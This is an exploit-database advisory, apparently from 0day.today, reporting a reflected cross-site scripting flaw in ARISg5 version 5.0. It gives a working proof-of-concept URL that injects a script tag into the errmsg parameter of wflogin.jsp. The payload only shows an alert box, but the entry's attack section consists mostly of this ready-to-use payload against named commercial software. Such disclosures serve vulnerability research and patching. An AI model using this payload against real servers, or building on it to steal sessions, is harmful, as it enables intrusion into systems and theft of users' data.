ARISg5 version 5.0 cross site scripting vulnerability

2010-02-26T00:00:00
ID 1337DAY-ID-11105
Type zdt
Reporter Yaniv Miron
Modified 2010-02-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
ARISg5 version 5.0 cross site scripting vulnerability
=====================================================

Hello,
Please see the following report:

ARISg5 (version 5.0) cross site scripting vulnerability
-----------------------------------------------------------------------
Application name: ARISg5 (arisglobal)
Version: 5.0
Class: Input Validation Error 
Type: Cross Site Scripting (XSS)
Remote: Yes
Credit: Yaniv Miron
Exploit:

http://SERVER_ADDRESS/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test
XSS')</script>




#  0day.today [2018-04-03]  #